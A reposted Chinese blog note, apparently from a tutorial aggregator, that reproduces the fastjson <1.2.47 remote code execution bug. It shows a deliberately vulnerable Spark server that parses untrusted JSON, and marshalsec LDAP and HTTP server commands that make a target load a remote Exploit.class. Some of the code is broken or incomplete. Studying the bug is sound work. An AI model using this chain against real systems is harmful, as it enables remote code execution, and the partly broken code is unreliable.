大佬教程收集整理的这篇文章主要介绍了fastjson<1.2.47 RCE 漏洞复现,大佬教程大佬觉得挺不错的,现在分享给大家,也给大家做个参考。
这两天爆出了 fastjson 的老洞,复现简单记录一下。
首先使用 spark 搭建一个简易的利用 fastjson 解析 json 的 http server。
@H_696_9@package cn.hacktech.fastjsonserver; import com.alibaba.fastjson.JSON; import static spark.Spark.*; public class Main { public static void main(String[] args) { get("/Hello",(req,res) -> "spark server start success"); post("/test",res) -> { String payload = req.body(); JSON.parse(payload); return "json payload:" + payload; }); } }编译出来后,启动这个 jar,在 /test
这个 post 点即可 post json payload。
然后这里分两类:
目前测试出来的是 rmi 有版本限制(据说是可能是 8u113 ),打不出来;ldap 是可以的。
poc-->LDAP-->http
poc 会通过上面的路径去请求你的 http 服务上面的对应的 class 文件然后去解析执行这个 class
启动 LDAP 用的 marshalsec,会比较方便。
python -m http.server 80
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://127.0.0.1/#Exploit
后面的 Exploit 是指 Exploit.class 文件
/test
java -cp fastjson-1.2.47.jar; PoC
其中代码编译的话,直接执行 javac the.java
即可,不过 PoC.java 的编译需要引入 fastjson jar 包,运行 javac -cp ./fastjson-1.2.47.jar PoC.java
具体的细节可见代码打包文件
以上是大佬教程为你收集整理的fastjson<1.2.47 RCE 漏洞复现全部内容,希望文章能够帮你解决fastjson<1.2.47 RCE 漏洞复现所遇到的程序开发问题。
如果觉得大佬教程网站内容还不错,欢迎将大佬教程推荐给程序员好友。
本图文内容来源于网友网络收集整理提供,作为学习参考使用,版权属于原作者。
如您有任何意见或建议可联系处理。小编QQ:384754419,请注明来意。